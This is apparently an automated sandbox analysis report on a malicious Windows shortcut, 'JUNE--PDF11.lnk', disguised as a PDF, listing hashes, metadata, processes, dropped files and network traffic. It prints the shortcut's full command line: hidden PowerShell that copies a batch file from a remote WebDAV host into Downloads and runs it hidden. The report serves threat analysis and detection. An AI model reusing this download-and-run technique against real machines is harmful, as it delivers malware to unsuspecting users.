File name: JUNE--PDF11.lnk

Full analysis: https://app.any.run/tasks/e0ff07d8-6040-4686-b62b-15d3d4d06953
Verdict: Malicious activity
Analysis date: February 02, 2025, 17:06:21
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
webdav
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Unicoded, MachineID vmi1845735, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Sat May 8 08:16:08 2021, atime=Sat May 8 08:16:08 2021, mtime=Sat May 8 08:16:08 2021, length=450560, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MD5: A9D993EDF6BCF8F6B3D8B81F8ADEF0DA
SHA1: AE5C80C3497C52892072B7F801CC88AE82E1FCCD
SHA256: 710C0A4F0A1956B1233A6A185FC4ED99E0CBABEE2BA7F71EDB6AE7C8211E6AA0
SSDEEP: 24:8Ff4NZsx2XMLD6cr2YKqDNjTWxOfdJBWkp+/CWt6SWl1qhSCFUMkW6SChXZO4I0s:8Ffo83pftax2dJQW0HkIzQIGKxfGYE5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3608)
  • SUSPICIOUS

    • Manipulates environment variables

      • powershell.exe (PID: 3608)
    • Starts process via Powershell

      • powershell.exe (PID: 3608)
    • Remote file execution via WebDAV

      • powershell.exe (PID: 3608)
  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3608)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, TargetMetadata
FileAttributes: Archive
CreateDate: 2021:05:08 08:16:08+00:00
AccessDate: 2021:05:08 08:16:08+00:00
ModifyDate: 2021:05:08 08:16:08+00:00
TargetFileSize: 450560
IconIndex: 1
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
DriveType: Fixed Disk
DriveSerialNumber: 5AC5-99CB
VolumeLabel: Windows
LocalBasePath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
RelativePath: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WorkingDirectory: C:\Users\Administrator\Desktop
CommandLineArguments: -w hidden -c "Copy-Item '\\bush-felt-fossil-richard.trycloudflare.com@SSL\DavWWWRoot\bas.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\bas.bat\" -WindowStyle Hidden"
IconFileName: %SystemRoot%\System32\SHELL32.dll
MachineID: vmi1845735
No data.
All screenshots are available in the full report
Total processes: 128
Monitored processes: 2
Malicious processes: 1
Suspicious processes: 0

Behavior graph

start -> powershell.exe -> conhost.exe

Process information

PID: 1704
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3608
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\bush-felt-fossil-richard.trycloudflare.com@SSL\DavWWWRoot\bas.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\bas.bat\" -WindowStyle Hidden"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 4 308
Read events: 4 308
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 3
Text files: 2
Unknown types: 0

Dropped files

PID: 3608, Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4knhl24y.fps.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 3608, Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\bde68f2d475f5c47.customDestinations-ms
Type: binary
MD5: 58F93A2A1AC5FC79F3DE64B4315AF144
SHA256: DF6954A4C55F00E61D2AFEFF3D2C107636F6065886972E505194F7100DCB1247

PID: 3608, Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_20td2b0e.jl2.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 3608, Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8XZCTGLJ5ZHMHUV76R0D.temp
Type: binary
MD5: 58F93A2A1AC5FC79F3DE64B4315AF144
SHA256: DF6954A4C55F00E61D2AFEFF3D2C107636F6065886972E505194F7100DCB1247

PID: 3608, Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: 651FFB84F65ABB77E9CAE4B63D43FA8B
SHA256: AC06BEF0D86D575B49DABE339D7500CFFE8955EA10CE9E8959EE95A01AA114C6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 26
DNS requests: 14
Threats: 0

HTTP requests

PID 5064, SearchApp.exe, GET, HTTP 200, 2.17.190.73:80
URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
CN: unknown, Reputation: whitelisted

PID 1176, svchost.exe, GET, HTTP 200, 2.17.190.73:80
URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
CN: unknown, Reputation: whitelisted

PID 6684, backgroundTaskHost.exe, GET, HTTP 200, 2.17.190.73:80
URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
CN: unknown, Reputation: whitelisted

PID 7024, SIHClient.exe, GET, HTTP 200, 23.59.18.102:80
URL: http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
CN: unknown, Reputation: whitelisted

PID 7024, SIHClient.exe, GET, HTTP 200, 23.59.18.102:80
URL: http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
CN: unknown, Reputation: whitelisted

Connections

51.104.136.2:443, ASN: MICROSOFT-CORP-MSN-AS-BLOCK, CN: IE, Reputation: whitelisted
PID 4, System -> 192.168.100.255:138, Reputation: whitelisted
PID 5064, SearchApp.exe -> 2.16.204.145:443 (www.bing.com), ASN: Akamai International B.V., CN: DE, Reputation: whitelisted
PID 5064, SearchApp.exe -> 2.17.190.73:80 (ocsp.digicert.com), ASN: AKAMAI-AS, CN: DE, Reputation: whitelisted
PID 3584, svchost.exe -> 4.231.128.59:443 (settings-win.data.microsoft.com), ASN: MICROSOFT-CORP-MSN-AS-BLOCK, CN: IE, Reputation: whitelisted
PID 1176, svchost.exe -> 20.190.159.2:443 (login.live.com), ASN: MICROSOFT-CORP-MSN-AS-BLOCK, CN: IE, Reputation: whitelisted
PID 1176, svchost.exe -> 2.17.190.73:80 (ocsp.digicert.com), ASN: AKAMAI-AS, CN: DE, Reputation: whitelisted
PID 1076, svchost.exe -> 23.218.210.69:443 (go.microsoft.com), ASN: AKAMAI-AS, CN: DE, Reputation: whitelisted
PID 4, System -> 192.168.100.255:137, Reputation: whitelisted
PID 7024, SIHClient.exe -> 20.109.210.53:443 (slscr.update.microsoft.com), ASN: MICROSOFT-CORP-MSN-AS-BLOCK, CN: US, Reputation: whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.16.204.145
  • 2.16.204.138
  • 2.16.204.152
  • 2.16.204.149
  • 2.16.204.135
  • 2.16.204.161
  • 2.16.204.160
  • 2.16.204.148
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
login.live.com
  • 20.190.159.2
  • 20.190.159.4
  • 20.190.159.68
  • 40.126.31.73
  • 40.126.31.67
  • 40.126.31.129
  • 20.190.159.71
  • 40.126.31.128
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
www.microsoft.com
  • 23.59.18.102
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
fd.api.iris.microsoft.com
  • 20.223.36.55
whitelisted

Threats

No threats detected
No debug info